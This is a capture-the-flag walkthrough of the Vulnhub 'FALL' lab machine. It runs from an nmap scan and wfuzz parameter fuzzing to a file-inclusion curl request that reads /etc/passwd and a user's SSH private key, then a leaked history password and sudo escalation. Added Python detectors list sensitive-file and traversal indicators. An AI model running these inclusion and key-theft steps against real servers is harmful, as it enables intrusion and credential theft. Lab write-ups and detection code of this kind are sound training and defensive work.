Vulnhub machine download link:
Download the machine directly: https://download.vulnhub.com/digitalworld/FALL.7z
If you don't know how to import a Vulnhub machine, click here for the setup article.
If anything in the steps below is unclear, you can message the author directly.
Virtual machine IP setup
Use arp-scan -l to list the live IPs on the current subnet.
Match the MAC address assigned when the VM was created to find the target's IP.
- Kali IP: 192.168.2.103
- Target IP: 192.168.2.128
Objective:
- Obtain the flag file in the target's /root/ directory
Attack path overview:
- Web directory scan
- GET parameter brute force with wfuzz
- Private key retrieval via file inclusion
- SSH login with the private key
- Shell history audit
- Privilege escalation with sudo su
Step 1: Information gathering
Run a full-port scan with service and OS detection: nmap -sS -sV -A -T4 -p- IP
The scan results are as follows
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -T4 -p- 192.168.2.128
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 02:15 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.2.128
Host is up (0.00076s latency).
Not shown: 65387 filtered tcp ports (no-response), 135 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
111/tcp closed rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| tls-alpn:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
445/tcp open Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.2.128:9090/
10080/tcp closed amanda
10443/tcp closed cirrossp
MAC Address: 08:00:27:DB:E0:43 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.0 - 5.5 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 3.10 (91%), Linux 2.6.32 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-28T15:17:32
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2023-11-28T07:17:32-08:00
|_clock-skew: mean: 10h39m59s, deviation: 4h37m09s, median: 7h59m58s
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.2.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.51 seconds
Quite a few ports are open. Port 80 serves HTTP with a CMS, so start there.
Run a directory scan first; results as follows
It turns up a suspicious PHP file, so open it.
Step 2: Fuzzing
The page reports that a GET parameter is missing.
Brute-force the parameter name with wfuzz, as follows
This reveals a "file" parameter.
Passing "/etc/passwd" to the file parameter returns the file contents, so this is a file inclusion vulnerability.
The passwd file also reveals a user named qiu.
Step 3: Private key retrieval
Use the file inclusion to display qiu's SSH private key.
Save the key with curl "http://192.168.2.128/test.php?file=/home/qiu/.ssh/id_rsa" > id_rsa, then cat the file to make sure it was retrieved intact.
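From the defender's side, both steps above leave a clear trace in the Apache access log: the wfuzz run hits one script with many different parameter names, and the inclusion requests carry absolute paths, traversal sequences or sensitive file names in a query value. The following Python is an added example (not code from the writeup or from the FALL machine) that scans combined-format access log lines for both signatures. The log lines are constructed to mirror the requests described above; the regex, thresholds and indicator lists are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format; only the fields up to the response size are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of file-inclusion probing inside a query-parameter value (assumed list).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/.ssh/", "id_rsa", "/proc/self/environ")
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")
WRAPPERS = ("php://", "file://", "data://", "expect://")


def classify_value(value):
    """Return the reasons a parameter value looks like an inclusion probe (empty if none)."""
    v = unquote(unquote(value))  # decode twice to catch %252e-style double encoding
    reasons = []
    if TRAVERSAL.search(v):
        reasons.append("traversal")
    if v.startswith("/"):
        reasons.append("absolute-path")
    if any(p in v for p in SENSITIVE_PATHS):
        reasons.append("sensitive-file")
    if any(v.lower().startswith(w) for w in WRAPPERS):
        reasons.append("php-wrapper")
    return reasons


def scan_line(line):
    """Parse one access-log line; return a finding dict for the first suspicious parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl already percent-decodes values once
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons = classify_value(value)
        if reasons:
            return {"ip": m.group("ip"), "path": parts.path, "param": name,
                    "value": value, "status": int(m.group("status")), "reasons": reasons}
    return None


def scan_log(lines):
    """Inclusion findings for every line of the log, in log order."""
    return [f for f in (scan_line(l) for l in lines) if f]


def param_fuzzing(lines, threshold=4):
    """Count distinct query-parameter names per (client, path). Many distinct names
    against a single script is the signature of parameter-name brute forcing."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        names = {n for n, _ in parse_qsl(parts.query, keep_blank_values=True)}
        seen.setdefault((m.group("ip"), parts.path), set()).update(names)
    return {k: len(v) for k, v in seen.items() if len(v) >= threshold}


# Constructed sample log (not captured from the real machine).
SAMPLE_LOG = [
    '192.168.2.103 - - [28/Nov/2023:02:20:11 -0500] "GET /test.php HTTP/1.1" 200 245 "-" "curl/8.4.0"',
    '192.168.2.103 - - [28/Nov/2023:02:20:30 -0500] "GET /test.php?id=x HTTP/1.1" 200 245 "-" "Wfuzz/3.1.0"',
    '192.168.2.103 - - [28/Nov/2023:02:20:30 -0500] "GET /test.php?page=x HTTP/1.1" 200 245 "-" "Wfuzz/3.1.0"',
    '192.168.2.103 - - [28/Nov/2023:02:20:31 -0500] "GET /test.php?dir=x HTTP/1.1" 200 245 "-" "Wfuzz/3.1.0"',
    '192.168.2.103 - - [28/Nov/2023:02:20:31 -0500] "GET /test.php?cmd=x HTTP/1.1" 200 245 "-" "Wfuzz/3.1.0"',
    '192.168.2.103 - - [28/Nov/2023:02:21:03 -0500] "GET /test.php?file=/etc/passwd HTTP/1.1" 200 1834 "-" "curl/8.4.0"',
    '192.168.2.50 - - [28/Nov/2023:02:23:01 -0500] "GET /index.php?page=products HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.2.103 - - [28/Nov/2023:02:22:40 -0500] "GET /test.php?file=/home/qiu/.ssh/id_rsa HTTP/1.1" 200 1679 "-" "curl/8.4.0"',
    '192.168.2.103 - - [28/Nov/2023:02:24:17 -0500] "GET /test.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1834 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']}?{f['param']}={f['value']} -> {', '.join(f['reasons'])}")
    for (ip, path), n in param_fuzzing(SAMPLE_LOG).items():
        print(f"possible parameter brute force: {ip} sent {n} distinct parameter names to {path}")
```

A 200 response on a line flagged "sensitive-file" is the case worth paging on: the server returned content rather than an error. Running the same logic over a whole day's log would also surface the directory scan from step 1 as a burst of 404s from one client, which the functions above deliberately leave out to keep them focused on the two steps described here.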
Step 4: Privilege escalation
Because of OpenSSH's permission checks, the key file must be mode 600 before it can be used:
chmod 600 id_rsa
Then log in as qiu with this private key.
Once in, check the .bash_history file.
It contains a password: "remarkablyawesomE"
Check sudo rights with "sudo -l"
The password is accepted, and the user has full sudo rights.
So we can escalate with "sudo su", as shown in the figure below.
Read the flag file and the machine is done.
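The history audit in step 4 works because a credential was typed on a command line and recorded in .bash_history. A defender can run the same audit proactively against users' history files. The following Python is an added example, not part of the writeup or the FALL machine: it scans shell-history lines for commands that commonly carry a password or token on the command line and reports a redacted hit. The history lines and the secret values are constructed, and the pattern list is an assumption covering a few common cases.

```python
import re

# Commands that commonly carry a credential on the command line (assumed list).
# Each pattern captures the secret in the named group "secret".
CRED_PATTERNS = [
    ("sshpass", re.compile(r"\bsshpass\s+-p\s*['\"]?(?P<secret>[^\s'\"]+)")),
    ("mysql-inline-password", re.compile(r"\bmysql\b.*\s-p(?P<secret>[^\s]+)")),
    ("sudo-stdin", re.compile(r"echo\s+['\"]?(?P<secret>[^\s'\"|]+)['\"]?\s*\|\s*sudo\s+-S")),
    ("curl-basic-auth", re.compile(r"\bcurl\b.*\s(?:-u|--user)\s+[^\s:]+:(?P<secret>[^\s]+)")),
    ("smbclient-userpass", re.compile(r"\bsmbclient\b.*\s-U\s+[^\s%]+%(?P<secret>[^\s]+)")),
    ("env-export", re.compile(r"\bexport\s+\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*=['\"]?(?P<secret>[^\s'\"]+)")),
]


def redact(secret):
    """Keep only the first two characters so a report never re-leaks the credential."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def audit_history(lines):
    """Return one finding per history line that matches a credential pattern."""
    findings = []
    for n, line in enumerate(lines, 1):
        for kind, pat in CRED_PATTERNS:
            m = pat.search(line)
            if m:
                findings.append({"line": n, "kind": kind,
                                 "secret_redacted": redact(m.group("secret"))})
                break  # one finding per line is enough
    return findings


# Constructed sample history (not taken from the real machine).
SAMPLE_HISTORY = [
    "ls -la",
    "cd /var/www/html",
    'echo "s3cretExample" | sudo -S systemctl restart httpd',
    "mysql -u root -pHunter2x sales",
    "sshpass -p 'Autumn!2019' ssh qiu@10.0.0.5",
    "mysql -u root -p",          # prompts for the password: nothing leaks
    "export API_TOKEN=abc123def",
    "vim test.php",
]

if __name__ == "__main__":
    for f in audit_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['kind']} (value {f['secret_redacted']})")
```

The mitigation side is the usual pair: rotate any credential that shows up in a hit, and keep it out of history in the first place (interactive prompts, HISTCONTROL=ignorespace, credential files with tight permissions). A password in history is only as dangerous as what it unlocks; here it unlocked unrestricted sudo, which is the other finding a sudo -l review on each account would have caught.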